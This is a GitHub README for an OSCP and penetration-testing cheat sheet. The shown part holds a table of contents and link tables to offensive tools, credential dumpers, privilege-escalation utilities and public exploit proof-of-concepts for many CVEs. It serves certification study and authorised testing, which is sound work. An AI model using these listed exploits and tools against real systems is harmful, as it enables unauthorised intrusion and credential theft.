0xsyr0/OSCP

GitHub: 0xsyr0/OSCP

A comprehensive hands-on cheat sheet for the OSCP exam and penetration testing.

Stars: 3692 | Forks: 759

# OSCP 速查表 ![GitHub stars](https://img.shields.io/github/stars/0xsyr0/OSCP?logoColor=yellow) ![GitHub forks](https://img.shields.io/github/forks/0xsyr0/OSCP?logoColor=purple) ![GitHub watchers](https://img.shields.io/github/watchers/0xsyr0/OSCP?logoColor=green)
![GitHub commit activity (branch)](https://img.shields.io/github/commit-activity/m/0xsyr0/OSCP) ![GitHub contributors](https://img.shields.io/github/contributors/0xsyr0/OSCP)

Since this little project gets more and more attention, I decided to update it as often as possible to focus on the commands that are more helpful and absolutely necessary for the exam. Since OffSec released the `OffSec Certified Professional Plus` or `OSCP+` certification, which is only valid for `3 years`, I will now add more advanced techniques such as `Active Directory Certificate Services (AD CS) Abuse` and `Shadow Credentials Attacks` to cover as much of the course content as possible.

If you have any suggestions, feel free to submit a pull request or contact me on [X](https://twitter.com/syr0_), or better on [Bluesky](https://bsky.app/profile/0xsyr0.bsky.social). Thanks a lot for your contributions!

Here are the links to the [OSCP Exam Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions) and to a discussion about [LinPEAS](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/?hss_channel=tw-134994790). I hope this helps.

In addition, there are two important resources you should check before taking the exam.

- [https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide)
- [https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams](https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams)

Thanks for reading.
## Table of Contents

- [Basics](#basics)
- [Information Gathering](#information-gathering)
- [Vulnerability Analysis](#vulnerability-analysis)
- [Web Application Analysis](#web-application-analysis)
- [Database Assessment](#database-assessment)
- [Password Attacks](#password-attacks)
- [Exploitation Tools](#exploitation-tools)
- [Post Exploitation](#post-exploitation)
- [Exploit Databases](#exploit-databases)
- [CVEs](#cves)
- [Payloads](#payloads)
- [Wordlists](#wordlists)
- [Reporting](#reporting)
- [Social Media Resources](#social-media-resources)
- [Commands](#commands)
  - [Basics](#basics-1)
    - [curl](#curl)
    - [File Transfer](#file-transfer)
    - [FTP](#ftp)
    - [Kerberos](#kerberos)
    - [Linux](#linux)
    - [Microsoft Windows](#microsoft-windows)
    - [NFS](#nfs)
    - [PHP Webserver](#php-webserver)
    - [Ping](#ping)
    - [Port Forwarding](#port-forwarding-1)
    - [Python Webserver](#python-webserver)
    - [RDP](#rdp)
    - [showmount](#showmount)
    - [SMB](#smb)
    - [smbclient](#smbclient)
    - [SSH](#ssh)
    - [Time and Date](#time-and-date)
    - [Tmux](#tmux)
    - [Upgrading Shells](#upgrading-shells)
    - [uv](#uv)
    - [VirtualBox](#virtualbox)
    - [virtualenv](#virtualenv)
  - [Information Gathering](#information-gathering-1)
    - [memcached](#memcached)
    - [NetBIOS](#netbios)
    - [Nmap](#nmap)
    - [Port Scanning](#port-scanning)
    - [snmpwalk](#snmpwalk)
  - [Web Application Analysis](#web-application-analysis-1)
    - [Burp Suite](#burp-suite)
    - [cadaver](#cadaver)
    - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)
    - [ffuf](#ffuf)
    - [Gobuster](#gobuster)
    - [GitTools](#gittools)
    - [Local File Inclusion (LFI)](#local-file-inclusion-lfi)
    - [PDF PHP Inclusion](#pdf-php-inclusion)
    - [PHP Upload Filter Bypasses](#php-upload-filter-bypasses)
    - [PHP Filter Chain Generator](#php-filter-chain-generator)
    - [PHP Generic Gadget Chains (PHPGGC)](#php-generic-gadget-chains-phpggc)
    - [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf)
    - [Server-Side Template Injection (SSTI)](#server-side-template-injection-ssti)
    - [Upload Vulnerabilities](#upload-vulnerabilities)
    - [wfuzz](#wfuzz)
    - [WPScan](#wpscan)
    - [XML External Entity (XXE)](#xml-external-entity-xxe)
  - [Database Analysis](#database-analysis)
    - [impacket-mssqlclient](#impacket-mssqlclient)
    - [MongoDB](#mongodb)
    - [MSSQL](#mssql)
    - [MySQL](#mysql)
    - [NoSQL Injection](#nosql-injection)
    - [PostgreSQL](#postgresql)
    - [Redis](#redis)
    - [SQL Injection](#sql-injection)
    - [SQL Truncation Attack](#sql-truncation-attack)
    - [sqlite3](#sqlite3)
    - [sqsh](#sqsh)
  - [Password Attacks](#password-attacks-1)
    - [DonPAPI](#donpapi)
    - [fcrack](#fcrack)
    - [Group Policy Preferences (GPP)](#group-policy-preferences-gpp)
    - [hashcat](#hashcat)
    - [Hydra](#hydra)
    - [John the Ripper](#john-the-ripper)
    - [Kerbrute](#kerbrute)
    - [LaZagne](#lazagne)
    - [mimikatz](#mimikatz)
    - [NetExec](#netexec)
    - [pypykatz](#pypykatz)
    - [Spray-Passwords](#spray-passwords)
  - [Exploitation Tools](#exploitation-tools-1)
    - [Metasploit](#metasploit)
  - [Post Exploitation](#post-exploitation-1)
    - [Account Operators Group Membership](#account-operators-group-membership)
    - [Active Directory](#active-directory)
    - [Active Directory Certificate Services (AD CS)](#active-directory-certificate-services-ad-cs)
    - [ADCSTemplate](#adcstemplate)
    - [ADMiner](#adminer)
    - [BloodHound](#bloodhound)
    - [Bloodhound-Legacy](#bloodhound-legacy)
    - [BloodHound Python](#bloodhound-python)
    - [bloodyAD](#bloodyAD)
    - [Certify](#certify)
    - [Certipy](#certipy)
    - [enum4linux-ng](#enum4linux-ng)
    - [Evil-WinRM](#evil-winrm)
    - [Impacket](#impacket-1)
    - [JAWS](#jaws)
    - [Kerberos](#kerberos-1)
    - [ldapsearch](#ldapsearch)
    - [Linux](#linux-1)
    - [Microsoft Windows](#microsoft-windows-1)
    - [NTLM](#ntlm)
    - [PassTheCert](#passthecert)
    - [Penelope](#penelope)
    - [PKINITtools](#pkinittools)
    - [Port Scanning](#port-scanning-1)
    - [powercat](#powercat)
    - [Powermad](#powermad)
    - [PowerShell](#powershell)
    - [PrivescCheck](#privesccheck)
    - [pwncat](#pwncat)
    - [rpcclient](#rpcclient)
    - [Rubeus](#rubeus)
    - [RunasCs](#runascs)
    - [Seatbelt](#seatbelt)
    - [Shadow Credentials](#shadow-credentials)
    - [smbpasswd](#smbpasswd)
    - [Titanis](#titanis)
    - [winexe](#winexe)
  - [Social Engineering Tools](#social-engineering-tools)
    - [Microsoft Office Word Phishing Macro](#microsoft-office-word-phishing-macro)
    - [Microsoft Windows Library Files](#microsoft-windows-library-files)
  - [CVE](#cve)
    - [CVE-2014-6271: Shellshock RCE PoC](#cve-2014-6271-shellshock-rce-poc)
    - [CVE-2016-1531: exim LPE](#cve-2016-1531-exim-lpe)
    - [CVE-2019-14287: Sudo Bypass](#cve-2019-14287-sudo-bypass)
    - [CVE-2020-1472: ZeroLogon PE](#cve-2020-1472-zerologon-pe)
    - [CVE-2021-3156: Sudo / sudoedit LPE](#cve-2021-3156-sudo--sudoedit-lpe)
    - [CVE-2021-42287: NoPac LPE](#cve-2021-42287-nopac-lpe)
    - [CVE-2021-44228: Log4Shell RCE (0-day)](#cve-2021-44228-log4shell-rce-0-day)
    - [CVE-2022-0847: Dirty Pipe LPE](#cve-2022-0847-dirty-pipe-lpe)
    - [CVE-2022-22963: Spring4Shell RCE (0-day)](#cve-2022-22963-spring4shell-rce-0-day)
    - [CVE-2022-31214: Firejail LPE](#cve-2022-31214-firejail-lpe)
    - [CVE-2023-21746: Windows NTLM EoP LocalPotato LPE](#cve-2023-21746-windows-ntlm-eop-localpotato-lpe)
    - [CVE-2023-22809: Sudo Bypass](#cve-2023-22809-sudo-bypass)
    - [CVE-2023-32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0-day)](#cve-2023-32629-cve-2023-2640-gameoverlay-ubuntu-kernel-exploit-lpe-0-day)
    - [CVE-2023-4911: Looney Tunables LPE](#cve-2023-4911-looney-tunables-lpe)
    - [CVE-2023-7028: GitLab Account Takeover](#cve-2023-7028-gitlab-account-takeover)
    - [CVE-2024-4577: PHP-CGI Argument Injection Vulnerability RCE](#cve-2024-4577-php-cgi-argument-injection-vulnerability-rce)
    - [CVE-2025-29927: Next.js Authentication Bypass](#cve-2025-29927-nextjs-authentication-bypass)
    - [CVE-2025-32463: chwoot sudo LPE](#cve-2025-32463-chwoot-sudo-lpe)
    - [CVE-2025-55182: React2Shell RCE](#cve-2025-55182-react2shell-rce)
    - [CVE-2026-24061: GNU Inetutils telnetd RCE](#cve-2026-24061-gnu-inetutils-telnetd-rce)
    - [BadSuccessor Delegated Managed Service Account (dMSA) LPE](#badsuccessor-delegated-managed-service-account-dmsa-lpe)
    - [GodPotato LPE](#godpotato-lpe)
    - [Juicy Potato LPE](#juicy-potato-lpe)
    - [JuicyPotatoNG LPE](#juicypotatong-lpe)
    - [MySQL 4.x/5.0 User Defined Function (UDF) Dynamic Library (2) LPE](#mysql-4x50-user-defined-function-udf-dynamic-library-2-lpe)
    - [PrintSpoofer LPE](#printspoofer-lpe)
    - [SharpEfsPotato LPE](#sharpefspotato-lpe)
    - [Shocker Container Escape](#shocker-container-escape)
  - [Payloads](#payloads-1)
    - [Exiftool](#exiftool)
    - [Reverse Shells](#reverse-shells)
    - [Web Shells](#web-shells)
  - [Templates](#templates)
    - [ASPX Web Shell](#aspx-web-shell)
    - [Bad YAML](#bad-yaml)
  - [Wordlists](#wordlists-1)
    - [Bash](#bash)
    - [CeWL](#cewl)
    - [CUPP](#cupp)
    - [crunch](#crunch)
    - [JavaScript Quick Wordlist](#javascript-quick-wordlist)
    - [Username Anarchy](#username-anarchy)

### Basics

| Name | URL |
| --- | --- |
| Chisel | https://github.com/jpillora/chisel |
| CyberChef | https://gchq.github.io/CyberChef |
| Ligolo-ng | https://github.com/nicocha30/ligolo-ng |
| Swaks | https://github.com/jetmore/swaks |

### Information Gathering

| Name | URL |
| --- | --- |
| Nmap | https://github.com/nmap/nmap |

### Vulnerability Analysis

| Name | URL |
| --- | --- |
| nikto | https://github.com/sullo/nikto |
| Sparta | https://github.com/SECFORCE/sparta |

### Web Application Analysis

| Name | URL |
| --- | --- |
| ffuf | https://github.com/ffuf/ffuf |
| fpmvuln | https://github.com/hannob/fpmvuln |
| Gobuster | https://github.com/OJ/gobuster |
| JSON Web Tokens | https://jwt.io |
| JWT_Tool | https://github.com/ticarpi/jwt_tool |
| JWTLens | https://jwtlens.netlify.app |
| Leaky Paths | https://github.com/ayoubfathi/leaky-paths |
| PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |
| PHP Filter Chain Generator | https://github.com/synacktiv/php_filter_chain_generator |
| PHPGGC | https://github.com/ambionics/phpggc |
| Spose | https://github.com/aancw/spose |
| Wfuzz | https://github.com/xmendez/wfuzz |
| WhatWeb | https://github.com/urbanadventurer/WhatWeb |
| WPScan | https://github.com/wpscanteam/wpscan |

### Database Assessment

| Name | URL |
| --- | --- |
| RedisModules-ExecuteCommand | https://github.com/n0b0dyCN/RedisModules-ExecuteCommand |
| Redis RCE | https://github.com/Ridter/redis-rce |
| Redis Rogue Server | https://github.com/n0b0dyCN/redis-rogue-server |
| SQL Injection Cheatsheet | https://tib3rius.com/sqli.html |

### Password Attacks

| Name | URL |
| --- | --- |
| Default Credentials Cheat Sheet | https://github.com/ihebski/DefaultCreds-cheat-sheet |
| Firefox Decrypt | https://github.com/unode/firefox_decrypt |
| hashcat | https://hashcat.net/hashcat |
| Hydra | https://github.com/vanhauser-thc/thc-hydra |
| John the Ripper | https://github.com/openwall/john |
| keepass-dump-masterkey | https://github.com/CMEPW/keepass-dump-masterkey |
| KeePwn | https://github.com/Orange-Cyberdefense/KeePwn |
| Kerbrute | https://github.com/ropnop/kerbrute |
| LaZagne | https://github.com/AlessandroZ/LaZagne |
| mimikatz | https://github.com/gentilkiwi/mimikatz |
| NetExec | https://github.com/Pennyw0rth/NetExec |
| ntlm.pw | https://ntlm.pw |
| pypykatz | https://github.com/skelsec/pypykatz |

### Exploitation Tools

| Name | URL |
| --- | --- |
| Evil-WinRM | https://github.com/Hackplayers/evil-winrm |
| Metasploit | https://github.com/rapid7/metasploit-framework |

### Post Exploitation

| Name | URL |
| --- | --- |
| ADCSKiller - An ADCS Exploitation Automation Tool | https://github.com/grimlockx/ADCSKiller |
| ADCSTemplate | https://github.com/GoateePFE/ADCSTemplate |
| ADMiner | https://github.com/Mazars-Tech/AD_Miner |
| adPEAS | https://github.com/ajm4n/adPEAS |
| BloodHound Docker | https://github.com/belane/docker-bloodhound |
| BloodHound | https://github.com/SpecterOps/BloodHound |
| BloodHound-Legacy | https://github.com/SpecterOps/BloodHound-Legacy |
| BloodHound | https://github.com/ly4k/BloodHound |
| BloodHound-Legacy Collectors | https://github.com/SpecterOps/BloodHound-Legacy/tree/master/Collectors |
| BloodHound Python | https://github.com/dirkjanm/BloodHound.py |
| bloodhound-quickwin | https://github.com/kaluche/bloodhound-quickwin |
| bloodyAD | https://github.com/CravateRouge/bloodyAD |
| Cable | https://github.com/logangoins/Cable |
| Certify | https://github.com/GhostPack/Certify |
| Certipy | https://github.com/ly4k/Certipy |
| certipy-merged | https://github.com/zimedev/certipy-merged |
| Cheat Sheet - Attack Active Directory | https://github.com/drak3hft7/Cheat-Sheet---Active-Directory |
| DonPAPI | https://github.com/login-securite/DonPAPI |
| enum4linux-ng | https://github.com/cddmp/enum4linux-ng |
| Ghostpack-CompiledBinaries | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries |
| GTFOBins | https://gtfobins.github.io |
| Impacket | https://github.com/fortra/impacket |
| Impacket Static Binaries | https://github.com/ropnop/impacket_static_binaries |
| JAWS | https://github.com/411Hall/JAWS |
| KrbRelay | https://github.com/cube0x0/KrbRelay |
| KrbRelayUp | https://github.com/Dec0ne/KrbRelayUp |
| Krbrelayx | https://github.com/dirkjanm/krbrelayx |
| LAPSDumper | https://github.com/n00py/LAPSDumper |
| LES | https://github.com/The-Z-Labs/linux-exploit-suggester |
| LinEnum | https://github.com/rebootuser/LinEnum |
| lsassy | https://github.com/Hackndo/lsassy |
| Moriarty | https://github.com/BC-SECURITY/Moriarty |
| nanodump | https://github.com/fortra/nanodump |
| Outpacket | https://github.com/n00py/Outpacket |
| PassTheCert | https://github.com/AlmondOffSec/PassTheCert |
| PEASS-ng | https://github.com/carlospolop/PEASS-ng |
| Penelope | https://github.com/brightio/penelope |
| PKINITtools | https://github.com/dirkjanm/PKINITtools |
| powercat | https://github.com/besimorhino/powercat |
| PowerSharpPack | https://github.com/S3cur3Th1sSh1t/PowerSharpPack |
| PowerUp | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 |
| PowerView | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 |
| PowerView.py | https://github.com/aniqfakhrul/powerview.py |
| PPLdump | https://github.com/itm4n/PPLdump |
| Priv2Admin | https://github.com/gtworek/Priv2Admin |
| PrivescCheck | https://github.com/itm4n/PrivescCheck |
| PSPKIAudit | https://github.com/GhostPack/PSPKIAudit |
| pspy | https://github.com/DominicBreuker/pspy |
| pth-toolkit | https://github.com/byt3bl33d3r/pth-toolkit |
| pwncat | https://github.com/calebstewart/pwncat |
| pypykatz | https://github.com/skelsec/pypykatz |
| pyWhisker | https://github.com/ShutdownRepo/pywhisker |
| Rubeus | https://github.com/GhostPack/Rubeus |
| RunasCs | https://github.com/antonioCoco/RunasCs |
| RustHound | https://github.com/OPENCYBER-FR/RustHound |
| scavenger | https://github.com/SpiderLabs/scavenger |
| SharpADWS | https://github.com/wh0amitz/SharpADWS |
| SharpCollection | https://github.com/Flangvik/SharpCollection |
| SharpChromium | https://github.com/djhohnstein/SharpChromium |
| SharpHound | https://github.com/SpecterOps/SharpHound |
| SharpSuccessor | https://github.com/logangoins/SharpSuccessor |
| SharpView | https://github.com/tevora-threat/SharpView |
| Sherlock | https://github.com/rasta-mouse/Sherlock |
| Titanis | https://github.com/trustedsec/Titanis |
| WADComs | https://wadcoms.github.io |
| Watson | https://github.com/rasta-mouse/Watson |
| WESNG | https://github.com/bitsadmin/wesng |
| Whisker | https://github.com/eladshamir/Whisker |
| Windows-privesc-check | https://github.com/pentestmonkey/windows-privesc-check |
| Windows Privilege Escalation Fundamentals | https://www.fuzzysecurity.com/tutorials/16.html |
| Windows Privilege Escalation | https://github.com/frizb/Windows-Privilege-Escalation |

### Exploit Databases

| Database | URL |
| --- | --- |
| 0day.today Exploit Database | https://0day.today |
| Exploit Database | https://www.exploit-db.com |
| Packet Storm | https://packetstormsecurity.com |
| Sploitus | https://sploitus.com |

### CVEs

| CVE | Description | URL |
| --- | --- | --- |
| CVE-2014-6271 | Shocker RCE | https://github.com/nccgroup/shocker |
| CVE-2014-6271 | Shellshock RCE PoC | https://github.com/zalalov/CVE-2014-6271 |
| CVE-2014-6271 | Shellshocker RCE POCs | https://github.com/mubix/shellshocker-pocs |
| CVE-2016-5195 | Dirty COW LPE | https://github.com/firefart/dirtycow |
| CVE-2016-5195 | Dirty COW '/proc/self/mem' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40847 |
| CVE-2016-5195 | Dirty COW 'PTRACE_POKEDATA' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40839 |
| CVE-2017-0144 | EternalBlue (MS17-010) RCE | https://github.com/d4t4s3c/Win7Blue |
| CVE-2017-0199 | RTF Dynamite RCE | https://github.com/bhdresh/CVE-2017-0199 |
| CVE-2018-7600 | Drupalgeddon 2 RCE | https://github.com/g0rx/CVE-2018-7600-Drupal-RCE |
| CVE-2018-10933 | libSSH Authentication Bypass | https://github.com/blacknbunny/CVE-2018-10933 |
| CVE-2018-16509 | Ghostscript PIL RCE | https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509 |
| CVE-2019-14287 | Sudo Bypass LPE | https://github.com/n0w4n/CVE-2019-14287 |
| CVE-2019-18634 | Sudo Buffer Overflow LPE | https://github.com/saleemrashid/sudo-cve-2019-18634 |
| CVE-2019-5736 | RunC Container Escape PoC | https://github.com/Frichetten/CVE-2019-5736-PoC |
| CVE-2019-6447 | ES File Explorer Open Port Arbitrary File Read | https://github.com/fs0c131y/ESFileExplorerOpenPortVuln |
| CVE-2019-7304 | dirty_sock LPE | https://github.com/initstring/dirty_sock |
| CVE-2020-0796 | SMBGhost RCE PoC | https://github.com/chompie1337/SMBGhost_RCE_PoC |
| CVE-2020-1472 | ZeroLogon PE Checker and Exploitation Code | https://github.com/VoidSec/CVE-2020-1472 |
| CVE-2020-1472 | ZeroLogon PE Exploitation Script | https://github.com/risksense/zerologon |
| CVE-2020-1472 | ZeroLogon PE PoC | https://github.com/dirkjanm/CVE-2020-1472 |
| CVE-2020-1472 | ZeroLogon PE Testing Script | https://github.com/SecuraBV/CVE-2020-1472 |
| CVE-2021-1675, CVE-2021-34527 | PrintNightmare LPE RCE | https://github.com/nemo-wq/PrintNightmare-CVE-2021-327 |
| CVE-2021-1675 | PrintNightmare LPE RCE (PowerShell Implementation) | https://github.com/calebstewart/CVE-2021-1675 |
| CVE-2021-21972 | vCenter RCE | https://github.com/horizon3ai/CVE-2021-21972 |
| CVE-2021-22204 | ExifTool Command Injection RCE | https://github.com/AssassinUKG/CVE-2021-22204 |
| CVE-2021-22204 | GitLab ExifTool RCE | https://github.com/CsEnox/Gitlab-Exiftool-RCE |
| CVE-2021-22204 | GitLab ExifTool RCE (Python Implementation) | https://github.com/convisolabs/CVE-2021-22204-exiftool |
| CVE-2021-26085 | Confluence Server RCE | https://github.com/Phuong39/CVE-2021-26085 |
| CVE-2021-27928 | MariaDB/MySQL wsrep provider RCE | https://github.com/Al1ex/CVE-2021-27928 |
| CVE-2021-3129 | Laravel Framework RCE | https://github.com/nth347/CVE-2021-3129_exploit |
| CVE-2021-3156 | Sudo / sudoedit LPE | https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit |
| CVE-2021-3156 | Sudo / sudoedit LPE PoC | https://github.com/blasty/CVE-2021-3156 |
| CVE-2021-3493 | OverlayFS Ubuntu Kernel Exploit LPE | https://github.com/briskets/CVE-2021-3493 |
| CVE-2021-3560 | polkit LPE (C Implementation) | https://github.com/hakivvi/CVE-2021-3560 |
| CVE-2021-3560 | polkit LPE | https://github.com/Almorabea/Polkit-exploit |
| CVE-2021-3560 | polkit LPE PoC | https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation |
| CVE-2021-36934 | HiveNightmare LPE | https://github.com/GossiTheDog/HiveNightmare |
| CVE-2021-36942 | PetitPotam | https://github.com/topotam/PetitPotam |
| CVE-2021-36942 | DFSCoerce | https://github.com/Wh04m1001/DFSCoerce |
| CVE-2021-4034 | PwnKit Pkexec Self-Contained Exploit LPE | https://github.com/ly4k/PwnKit |
| CVE-2021-4034 | PwnKit Pkexec LPE PoC (1) | https://github.com/dzonerzy/poc-cve-2021-4034 |
| CVE-2021-4034 | PwnKit Pkexec LPE PoC (2) | https://github.com/arthepsy/CVE-2021-4034 |
| CVE-2021-4034 | PwnKit Pkexec LPE PoC (3) | https://github.com/nikaiw/CVE-2021-4034 |
| CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Archived) | https://github.com/klinix5/InstallerFileTakeOver |
| CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Fork) | https://github.com/waltlin/CVE-2021-41379-With-Public-Exploit-Lets-You-Become-An-Admin-InstallerFileTakeOver |
| CVE-2021-41773, CVE-2021-42013, CVE-2020-17519 | Simple Apache Path Traversal (0-day) | https://github.com/MrCl0wnLab/SimplesApachePathTraversal |
| CVE-2021-42278, CVE-2021-42287 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE | https://github.com/WazeHell/sam-the-admin |
| CVE-2021-42278 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE (Python Implementation) | https://github.com/ly4k/Pachine |
| CVE-2021-42287, CVE-2021-42278 | noPac LPE (1) | https://github.com/cube0x0/noPac |
| CVE-2021-42287, CVE-2021-42278 | noPac LPE (2) | https://github.com/Ridter/noPac |
| CVE-2021-42321 | Microsoft Exchange Server RCE | https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398 |
| CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/kozmer/log4j-shell-poc |
| CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/welk1n/JNDI-Injection-Exploit |
| CVE-2022-0847 | DirtyPipe-Exploit LPE | https://github.com/n3rada/DirtyPipe |
| CVE-2022-0847 | DirtyPipe-Exploits LPE | https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits |
| CVE-2022-21999 | SpoolFool, Windows Print Spooler LPE | https://github.com/ly4k/SpoolFool |
| CVE-2022-22963 | Spring4Shell RCE (0-day) | https://github.com/tweedge/springcore-0day-en |
| CVE-2022-23119, CVE-2022-23120 | Trend Micro Deep Security Agent for Linux Arbitrary File Read | https://github.com/modzero/MZ-21-02-Trendmicro |
| CVE-2022-24715 | Icinga Web 2 Authenticated Remote Code Execution RCE | https://github.com/JacobEbben/CVE-2022-24715 |
| CVE-2022-26134 | ConfluentPwn RCE (0-day) | https://github.com/redhuntlabs/ConfluentPwn |
| CVE-2022-31214 | Firejail / Firejoin LPE | https://seclists.org/oss-sec/2022/q2/188 |
| CVE-2022-31214 | Firejail / Firejoin LPE | https://www.openwall.com/lists/oss-security/2022/06/08/10 |
| CVE-2022-34918 | Netfilter Kernel Exploit LPE | https://github.com/randorisec/CVE-2022-34918-LPE-PoC |
| CVE-2022-46169 | Cacti Authentication Bypass RCE | https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit |
| CVE-2023-20598 | PDFWKRNL Kernel Driver LPE | https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL |
| CVE-2023-21746 | Windows NTLM EoP LocalPotato LPE | https://github.com/decoder-it/LocalPotato |
| CVE-2023-21768 | Windows Ancillary Function Driver for WinSock LPE POC | https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768 |
| CVE-2023-21817 | Kerberos Unlock LPE PoC | https://gist.github.com/monoxgas/f615514fb51ebb55a7229f3cf79cf95b |
| CVE-2023-22809 | sudoedit LPE | https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc |
| CVE-2023-23752 | Joomla Unauthenticated Information Disclosure | https://github.com/Acceis/exploit-CVE-2023-23752 |
| CVE-2023-25690 | Apache mod_proxy HTTP Request Smuggling PoC | https://github.com/dhmosfunk/CVE-2023-25690-POC |
| CVE-2023-28879 | Shell in the Ghost: Ghostscript RCE PoC | https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce |
| CVE-2023-32233 | Use-After-Free in Netfilter nf_tables LPE | https://github.com/Liuk3r/CVE-2023-32233 |
| CVE-2023-32629, CVE-2023-2640 | GameOverlay Ubuntu Kernel Exploit LPE (0-day) | https://twitter.com/liadeliyahu/status/1684841527959273472?s=09 |
| CVE-2023-36874 | Windows Error Reporting Service LPE (0-day) | https://github.com/Wh04m1001/CVE-2023-36874 |
| CVE-2023-51467, CVE-2023-49070 | Apache OFBiz Authentication Bypass | https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass |
| CVE-2023-7028 | GitLab Account Takeover | https://github.com/V1lu0/CVE-2023-7028 |
| CVE-2023-7028 | GitLab Account Takeover | https://github.com/Vozec/CVE-2023-7028 |
| CVE-2024-0582 | Ubuntu Linux Kernel io_uring LPE | https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582 |
| CVE-2024-1086 | Use-After-Free in Linux Kernel Netfilter nf_tables LPE | https://github.com/Notselwyn/CVE-2024-1086 |
| CVE-2024-4577 | PHP-CGI Argument Injection Vulnerability RCE | https://github.com/watchtowrlabs/CVE-2024-4577 |
| CVE-2024-30088 | Microsoft Windows LPE | https://github.com/tykawaii98/CVE-2024-30088 |
| CVE-2024-49138 | Windows Common Log File System Driver LPE | https://github.com/MrAle98/CVE-2024-49138-POC |
| CVE-2025-14847 | MongoBleed MongoDB Unauthenticated Memory Leak Exploit RCE | https://github.com/joe-desimone/mongobleed |
| CVE-2025-24071 | Windows File Explorer Spoofing Vulnerability (1) | https://github.com/ThemeHackers/CVE-2025-24071 |
| CVE-2025-24071 | Windows File Explorer Spoofing Vulnerability (2) | https://github.com/0x6rss/CVE-2025-24071_PoC |
| CVE-2025-24813 | Apache Tomcat Deserialization RCE (1) | https://github.com/iSee857/CVE-2025-24813-PoC |
| CVE-2025-24813 | Apache Tomcat Deserialization RCE (2) | https://github.com/absholi7ly/POC-CVE-2025-24813 |
| CVE-2025-29927 | Next.js Authentication Bypass | https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware |
| CVE-2025-30397 | Use-After-Free in Windows Server 2025 JScript.dll (RCE) | https://github.com/mbanyamer/CVE-2025-30397---Windows-Server-2025-JScript-RCE-Use-After-Free- |
| CVE-2025-32463 | chwoot sudo LPE | https://github.com/pr0v3rbs/CVE-2025-32463_chwoot |
| CVE-2025-55182 | React2Shell RCE | https://github.com/msanft/CVE-2025-55182 |
| CVE-2025-62215 | Windows Kernel LPE | https://github.com/dexterm300/CVE-2025-62215-exploit-poc |
| CVE-2025-9074 | Docker Desktop (Windows) Container Escape - Host Write via Exposed Engine API | https://github.com/zenzue/CVE-2025-9074 |
| CVE-2026-24061 | GNU Inetutils telnet RCE | https://github.com/SafeBreach-Labs/CVE-2026-24061 |
| n/a | BadSuccessor LPE | https://github.com/ibaiC/BadSuccessor |
| n/a | dompdf RCE (0-day) | https://github.com/positive-security/dompdf-rce |
| n/a | dompdf XSS to RCE (0-day) | https://positive.security/blog/dompdf-rce |
| n/a | StorSvc LPE | https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc |
| n/a | ADCSCoercePotato | https://github.com/decoder-it/ADCSCoercePotato |
| n/a | CoercedPotato LPE | https://github.com/Prepouce/CoercedPotato |
| n/a | DCOMPotato LPE | https://github.com/zcgonvh/DCOMPotato |
| n/a | DeadPotato LPE | https://github.com/lypd0/DeadPotato |
| n/a | GenericPotato LPE | https://github.com/micahvandeusen/GenericPotato |
| n/a | GodPotato LPE | https://github.com/BeichenDream/GodPotato |
| n/a | JuicyPotato LPE | https://github.com/ohpe/juicy-potato |
| n/a | Juice-PotatoNG LPE | https://github.com/antonioCoco/JuicyPotatoNG |
| n/a | MultiPotato LPE | https://github.com/S3cur3Th1sSh1t/MultiPotato |
| n/a | RemotePotato0 PE | https://github.com/antonioCoco/RemotePotato0 |
| n/a | RoguePotato LPE | https://github.com/antonioCoco/RoguePotato |
| n/a | RottenPotatoNG LPE | https://github.com/breenmachine/RottenPotatoNG |
| n/a | RustPotato LPE | https://github.com/safedv/RustPotato |
| n/a | SharpEfsPotato LPE | https://github.com/bugch3ck/SharpEfsPotato |
| n/a | SigmaPotato LPE | https://github.com/tylerdotrar/SigmaPotato |
| n/a | SweetPotato LPE | https://github.com/CCob/SweetPotato |
| n/a | SweetPotato LPE | https://github.com/uknowsec/SweetPotato |
| n/a | S4UTomato LPE | https://github.com/wh0amitz/S4UTomato |
| n/a | PrintSpoofer LPE (1) | https://github.com/dievus/printspoofer |
| n/a | PrintSpoofer LPE (2) | https://github.com/itm4n/PrintSpoofer |
| n/a | SharpSuccessor LPE | https://github.com/logangoins/SharpSuccessor |
| n/a | Shocker Container Escape | https://github.com/gabrtv/shocker |
| n/a | SystemNightmare PE | https://github.com/GossiTheDog/SystemNightmare |
| n/a | NoFilter LPE | https://github.com/deepinstinct/NoFilter |
| n/a | OfflineSAM LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM |
